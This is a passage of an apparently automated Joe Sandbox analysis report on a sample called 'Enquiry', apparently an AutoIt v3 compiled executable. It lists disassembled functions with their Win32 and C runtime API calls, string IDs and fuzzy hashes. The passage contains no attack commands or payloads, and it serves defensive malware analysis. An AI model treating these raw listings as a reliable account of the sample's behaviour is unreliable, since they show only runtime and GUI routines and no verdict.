                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                            • String ID: @$AutoIt v3 GUI
                            • API String ID: 867697134-3359773793
                            • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                            • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                            • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                            • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __wcsicoll$__wcsnicmp
                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                            • API String ID: 790654849-32604322
                            • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                            • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                            • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                            • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                            • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                            • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                            • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                            APIs
                              • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                            • _fseek.LIBCMT ref: 00452B3B
                            • __wsplitpath.LIBCMT ref: 00452B9B
                            • _wcscpy.LIBCMT ref: 00452BB0
                            • _wcscat.LIBCMT ref: 00452BC5
                            • __wsplitpath.LIBCMT ref: 00452BEF
                            • _wcscat.LIBCMT ref: 00452C07
                            • _wcscat.LIBCMT ref: 00452C1C
                            • __fread_nolock.LIBCMT ref: 00452C53
                            • __fread_nolock.LIBCMT ref: 00452C64
                            • __fread_nolock.LIBCMT ref: 00452C83
                            • __fread_nolock.LIBCMT ref: 00452C94
                            • __fread_nolock.LIBCMT ref: 00452CB5
                            • __fread_nolock.LIBCMT ref: 00452CC6
                            • __fread_nolock.LIBCMT ref: 00452CD7
                            • __fread_nolock.LIBCMT ref: 00452CE8
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                            • __fread_nolock.LIBCMT ref: 00452D78
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                            • String ID:
                            • API String ID: 2054058615-0
                            • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                            • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                            • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                            • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                            APIs
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window
                            • String ID: 0
                            • API String ID: 2353593579-4108050209
                            • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                            • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                            • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                            • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                            APIs
                            • GetSysColor.USER32(0000000F), ref: 0044A05E
                            • GetClientRect.USER32(?,?), ref: 0044A0D1
                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                            • GetWindowDC.USER32(?), ref: 0044A0F6
                            • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                            • ReleaseDC.USER32(?,?), ref: 0044A11B
                            • GetSysColor.USER32(0000000F), ref: 0044A131
                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                            • GetSysColor.USER32(0000000F), ref: 0044A14F
                            • GetSysColor.USER32(00000005), ref: 0044A15B
                            • GetWindowDC.USER32(?), ref: 0044A1BE
                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                            • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                            • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                            • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                            • ReleaseDC.USER32(?,00000000), ref: 0044A229
                            • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                            • GetSysColor.USER32(00000008), ref: 0044A265
                            • SetTextColor.GDI32(?,00000000), ref: 0044A270
                            • SetBkMode.GDI32(?,00000001), ref: 0044A282
                            • GetStockObject.GDI32(00000005), ref: 0044A28A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                            • String ID:
                            • API String ID: 1744303182-0
                            • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                            • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                            • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                            • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                            APIs
                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                            • __mtterm.LIBCMT ref: 00417C34
                              • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                              • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                              • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                              • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                            • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                            • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                            • __init_pointers.LIBCMT ref: 00417CE6
                            • __calloc_crt.LIBCMT ref: 00417D54
                            • GetCurrentThreadId.KERNEL32 ref: 00417D80
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                            • API String ID: 4163708885-3819984048
                            • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                            • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                            • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                            • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __wcsicoll$IconLoad
                            • String ID: blank$info$question$stop$warning
                            • API String ID: 2485277191-404129466
                            • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                            • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                            • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                            • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                            APIs
                            • LoadIconW.USER32(?,00000063), ref: 0045464C
                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                            • SetWindowTextW.USER32(?,?), ref: 00454678
                            • GetDlgItem.USER32(?,000003EA), ref: 00454690
                            • SetWindowTextW.USER32(00000000,?), ref: 00454697
                            • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                            • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                            • GetWindowRect.USER32(?,?), ref: 004546F5
                            • SetWindowTextW.USER32(?,?), ref: 00454765
                            • GetDesktopWindow.USER32 ref: 0045476F
                            • GetWindowRect.USER32(00000000), ref: 00454776
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                            • GetClientRect.USER32(?,?), ref: 004547D2
                            • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                            • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                            • String ID:
                            • API String ID: 3869813825-0
                            • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                            • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                            • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                            • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                            APIs
                            • _wcslen.LIBCMT ref: 00464B28
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                            • _wcslen.LIBCMT ref: 00464C28
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                            • _wcslen.LIBCMT ref: 00464CBA
                            • _wcslen.LIBCMT ref: 00464CD0
                            • _wcslen.LIBCMT ref: 00464CEF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _wcslen$Directory$CurrentSystem
                            • String ID: D
                            • API String ID: 1914653954-2746444292
                            • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                            • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                            • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                            • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                            APIs
                            • _wcsncpy.LIBCMT ref: 0045CE39
                            • __wsplitpath.LIBCMT ref: 0045CE78
                            • _wcscat.LIBCMT ref: 0045CE8B
                            • _wcscat.LIBCMT ref: 0045CE9E
                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                            • _wcscpy.LIBCMT ref: 0045CF61
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                            • String ID: *.*
                            • API String ID: 1153243558-438819550
                            • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                            • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                            • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                            • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __wcsicoll
                            • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                            • API String ID: 3832890014-4202584635
                            • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                            • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                            • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                            • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                            APIs
                            • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                            • GetFocus.USER32 ref: 0046A0DD
                            • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessagePost$CtrlFocus
                            • String ID: 0
                            • API String ID: 1534620443-4108050209
                            • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                            • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                            • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                            • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                            APIs
                            • DestroyWindow.USER32(?), ref: 004558E3
                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window$CreateDestroy
                            • String ID: ,$tooltips_class32
                            • API String ID: 1109047481-3856767331
                            • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                            • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                            • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
